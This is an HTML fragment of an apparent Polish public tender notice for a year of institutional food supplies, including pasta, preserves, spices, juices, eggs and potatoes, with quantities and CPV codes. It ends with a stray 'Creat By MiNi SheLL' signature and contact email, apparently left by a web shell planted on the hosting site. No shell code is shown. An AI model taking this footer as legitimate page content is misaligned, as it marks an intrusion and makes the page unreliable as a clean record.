6.	Mąka ziemniaczana ( od 0,5 kg  do 1 kg ) - 200 kg.
7.	Sól ( od 1kg do 50 kg ) - 2 000 kg.                
8.	Kaszka manna ( od 1 kg  do 25 kg ) - 600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.61.21.00-2, 15.61.33.80-5, 15.61.23.00-4, 15.87.24.00-5, 03.21.13.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2 : Makarony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Makaron jajeczny kolanka / świderki ( od 1 kg do 5 kg ) - 2 000 kg.
2.	Makaron jajeczny / gruba nitka ( od 1 kg do 5 kg ) - 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3 : Desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kisiel - różne smaki - ( Cykoria ) - ( paczkowany do 1 kg ) - 200 kg.
2.	Budyń - różne smaki - ( Cykoria )  - ( paczkowany do 1 kg ) - 120 kg.
3.	Galaretka owocowa - różne smaki - ( Cykoria ) - ( paczkowana do 1 kg ) - 150 kg.
4.	Żelatyna bez przypraw - ( Cykoria ) - ( paczkowana do 1 kg )-  30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4 : Kawa, herbata i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Herbata czarna granulowana ( 1 kg ) - 360 kg.
2.	Herbata owocowa ekspresowa ( paczkowana - od 20 g do 1 kg ) - 20 kg.
3.	Herbata miętowa ekspresowa ( paczkowana - od 20 g do 1 kg ) - 20 kg.
4.	Kawa zbożowa  ( od 0.5 kg do 1 kg ) - 900 kg.
5.	Kakao - ( Deco Moreno ) - ( 200 g ) - 90 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.86.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa 5 :  Zupy instant.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zupa żurek - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 120 kg.
2.	Zupa pieczarkowa - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 120 kg.
3.	Zupa szparagowa - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 120 kg.
4.	Sos sałatkowy - instant - ( Knorr ) - ( od 1 kg do 3 kg ) - 50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.14.00-4, 15.87.12.60-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa 6 :  Przetwory owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Miód pszczeli naturalny ( od 200 g do 400 g )  - 100 kg.
2.	Miód pszczeli naturalny porcjowany (od 25 g do 30 g ) - 280 kg.
3.	Dżem truskawkowy ( od 280 g do 350 g ) - 150 kg.
4.	Dżem wiśniowy ( od 280 g do 350 g ) - 150 kg.
5.	Dżem porcjowany - różne smaki ( od 25 g do 30 g ) - 280 kg.
6.	Powidła śliwkowe ( od 280 g do 400 g ) - 150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.21.00-9, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa 7 : Przetwory owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mus jabłkowy ( od 700 g do 1 000 g ) - 880 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.21.40-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Grupa 8 : Przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Koncentrat pomidorowy 30 % - ( Włocławek ) - ( od 900 g do 1 000 g ) - 200 kg.
2.	Koncentrat pomidorowy 30 % - ( Włocławek ) -  ( od 1 000 g do 3 000 g ) - 200 kg.
3.	Sok pomidorowy łagodny bez cukru ( 1 litr ) - 2 000 litrów.
4.	Sok pomidorowy bez cukru - ( 250 - 330 ml - butelka ) - 200 litrów.
5.	Sok Warzywno-owocowy  zagęszczony - ( 200 - 330 ml ) - butelka lub kartonik   - 1000 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.11.34-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Grupa 9 : Przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szczaw  konserwowy ( od 300 do 400 g ) - 400 kg.
2.	Koncentrat barszczu czerwonego ( do 1 litra ) - 50 litrów.
3.	Przecier ogórkowy ( od 300 g do 400 g ) - 200 kg.
4.	Kukurydza konserwowa ( od 300 g do 400 g ) - 100 kg.
5.	Musztarda stołowa ( od 1 kg do kg ) - 50 kg.
6.	Ketchup - 100 kg   ( od 1 kg do 3 kg ). 
7.	Majonez - 100 kg ( od 1 kg do 3 kg ).
8.	Ogórek konserwowy -300 kg ( od 1 kg do 3 kg ).
9.	Papryka konserwowa - 300 kg ( od 720 g do 3 000 g ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.14.00-1, 15.87.12.50-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Grupa 10 : Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przyprawa w płynie do zup, sosów, typu magi - ( Winiary) -  ( 1 000 ml ) - 320 litrów.
2.	 Pieprz czarny, naturalny mielony ( do 1 000 g ) - 30 kg.
3.	 Pieprz ziołowy ( do 1 000 g ) - 30 kg.
4.	 Papryka czerwona, słodka, mielona ( do 1 000 g ) - 30 kg.
5.	 Majeranek otarty ( do 100 g ) - 10 kg.
6.	 Ziele angielskie ( do 100 g ) - 4 kg.
7.	 Liść laurowy ( do 100 g ) - 4 kg.
8.	 Przyprawa do potraw typu Wegeta ( Winiary)  - ( od 1 do 5 kg ) - 110 kg.
9.	 Ocet spirytusowy 10 %  ( 0,5 litra ) - 200 litrów.
10.	 Oregano ( do 100 g ) - 1 kg.
11.	 Czosnek granulowany ( do 100 g ) - 5 kg.
12.	 Kwas cytrynowy ( od 50 g do 100 g ) - 30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.00.00-7, 15.87.21.00-2, 15.87.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Grupa 11 : Soki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sok jabłkowy 100 %, bez cukru ( od 1litra do 2 litrów ) - 600 litrów.
2.	Sok pomarańczowy 100 %, bez cukru ( od 1 litra do 2 litrów ) - 600 litrów.
3.	Sok czarna porzeczka 100%, bez cukru ( od 1 litra do 2 litrów ) - 600 litrów.
4.	Sok 100%, różne smaki, bez cukru ( kartonik  200 ml ze słomką ) - 1 000 litrów.
5.	Syrop owocowy malina ( wiśnia ) -  ( od 2 litrów do 7 litrów ) - 500 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.32.17.00-1, 15.32.10.00-4, 15.83.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Grupa 12:  Ciastka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Herbatniki bez czekolady ( od 50 g do 100 g ) - 50 kg.
2.	 Wafle bez czekolady ( od 30 g do 50 g ) - 50 kg. 
3.	 Chrupki kukurydziane naturalne ( paczkowane - od 60 do100 g ) - 150 kg. 
4.	 Krakersy naturalne  ( paczkowane -180 g ) - 110 kg.  
5.	 Suchary bez cukru  ( Mamut ) - ( paczkowane - 280 g ) - 600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Grupa 13 : Ciastka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Wafle ryżowe naturalne ( paczkowane od 100 do 300 g ) - 100 kg. 
2.  Listki waflowe bez cukru ( 32 g ) - 50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Grupa 14 : Tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	  Masło roślinne bezmleczne do smarowania, zawartość tłuszczu roślinnego 80 % ( od 250 g do 500 g ) - 1 200 kg.
2.	  Margaryna zwykła kostka ( od 250 g do 500 g ) - 1 600 kg.
3.	  Olej rzepakowy uniwersalny ( 1 litrowy ) - 1 000 litrów.
4.	  Olej rzepakowy uniwersalny ( od 3 litrów do 5 litrów ) - 1 500 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.43.11.00-9, 15.41.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Grupa 15 : Mleko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Mleko w proszku, pełne ( 500 g ) - 50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.51.17.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Grupa 16 : Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze klasa M ( od 53 g do 63 g, średnie ) - 100 000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Grupa 17: Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Ziemniaki jadalne - ( od 20 kg do 50 kg ) - 70 000 kg - ( wartość obejmuje dostawę ziemniaków młodych od 01.07 ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com